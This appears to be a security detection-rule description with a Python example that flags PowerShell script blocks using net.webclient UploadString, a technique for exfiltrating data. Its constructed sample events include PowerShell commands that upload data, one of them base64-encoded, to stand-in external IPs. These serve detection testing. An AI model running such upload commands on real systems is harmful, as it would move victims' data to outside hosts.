
Summary
This analytic rule identifies potential data exfiltration over PowerShell by looking for script blocks that create a `net.webclient` object and call its `UploadString` method. It relies on PowerShell Script Block Logging (EventCode 4104), which records the full text of each executed script block, so a match exposes the exact command, including the destination URI, used to push data such as files or screenshots to an external server. Catching these script blocks lets security teams pinpoint when data is being transferred out of the host, a behavior associated with malware campaigns such as Winter-Vivern. If the activity is confirmed as malicious, it indicates an active data leak and that the endpoint is under attacker control. To implement this rule, PowerShell Script Block Logging must be enabled on the monitored endpoints; see the associated setup documentation for details. Legitimate administrative scripts that upload to internal services will also match, so tune the rule against known internal destinations before alerting on it.
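To make the match logic concrete, the following added example (it is not the rule's own SPL and not code from the content project) applies the same two-term check, `net.webclient` plus `UploadString` in the ScriptBlockText of EventCode 4104 events, over a handful of constructed script block events. It also extracts the destination URI from the matched block and shows the tuning step of skipping known internal hosts. The event field names, the sample hosts, users and URIs, and the allow-list are all assumptions made for the example.

```python
"""Added example: the UploadString exfiltration check from the rule summary,
run over constructed PowerShell Script Block Logging (EventCode 4104) events.
Not the analytic's own SPL; field names and sample data are assumptions."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import urlparse

# Constructed sample events (not real telemetry). Field names are assumed.
SAMPLE_EVENTS = [
    {"Computer": "ws01.corp.example", "UserID": "S-1-5-21-1", "EventCode": 4104,
     "ScriptBlockText": "$wc = New-Object Net.WebClient; "
                        "$wc.UploadString('http://203.0.113.10/up.php', $data)"},
    {"Computer": "ws02.corp.example", "UserID": "S-1-5-21-2", "EventCode": 4104,
     "ScriptBlockText": "(new-object system.net.webclient).uploadstring("
                        "'https://198.51.100.7/c', [Convert]::ToBase64String($bytes))"},
    {"Computer": "build01.corp.example", "UserID": "S-1-5-21-3", "EventCode": 4104,
     "ScriptBlockText": "$c = New-Object Net.WebClient; "
                        "$c.UploadString('https://intranet.corp.example/api/report', $json)"},
    # DownloadString only: must not match, the rule is about uploads.
    {"Computer": "ws03.corp.example", "UserID": "S-1-5-21-4", "EventCode": 4104,
     "ScriptBlockText": "$wc = New-Object Net.WebClient; "
                        "$html = $wc.DownloadString('https://example.com')"},
    # Wrong event code: the rule only consumes 4104 script block text.
    {"Computer": "ws03.corp.example", "UserID": "S-1-5-21-4", "EventCode": 4103,
     "ScriptBlockText": "$wc.UploadString('http://203.0.113.10/up.php', $data)"},
]

# First quoted http(s) URI in the block; the upload destination in practice.
URI_RE = re.compile(r"""['"](https?://[^'"]+)['"]""", re.IGNORECASE)


@dataclass
class Hit:
    computer: str
    user: str
    uri: Optional[str]
    script: str


def is_uploadstring_exfil(event: dict) -> bool:
    """The rule's core match: a 4104 script block that references both
    net.webclient and UploadString. PowerShell is case-insensitive, so the
    comparison is done on a lower-cased copy of the script text."""
    if event.get("EventCode") != 4104:
        return False
    text = event.get("ScriptBlockText", "").lower()
    return "net.webclient" in text and "uploadstring" in text


def extract_uri(script: str) -> Optional[str]:
    """Pull the destination URI out of the script block, if it is a literal."""
    match = URI_RE.search(script)
    return match.group(1) if match else None


def detect(events: Iterable[dict], allowed_hosts: Iterable[str] = ()) -> List[Hit]:
    """Run the check over events and drop uploads to allow-listed internal
    hosts (the tuning the summary calls for). Blocks whose URI is not a
    literal are kept: an obfuscated destination is not a reason to suppress."""
    allowed = {h.lower() for h in allowed_hosts}
    hits: List[Hit] = []
    for event in events:
        if not is_uploadstring_exfil(event):
            continue
        uri = extract_uri(event["ScriptBlockText"])
        host = urlparse(uri).hostname if uri else None
        if host and host.lower() in allowed:
            continue
        hits.append(Hit(event["Computer"], event["UserID"], uri,
                        event["ScriptBlockText"]))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS, allowed_hosts={"intranet.corp.example"}):
        print(f"{hit.computer} {hit.user} -> {hit.uri}")
```

Of the five constructed events, three satisfy the two-term check; the `DownloadString` block and the non-4104 event do not. With `intranet.corp.example` allow-listed, the build server's report upload is suppressed and two hits remain, each carrying the external URI an analyst would pivot on. Note that the allow-list only works when the URI is a string literal in the block; a destination assembled at runtime is still reported.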
Categories
- Endpoint
Data Sources
- PowerShell Script Block Logging (EventCode 4104)
ATT&CK Techniques
- T1041
Created: 2024-11-13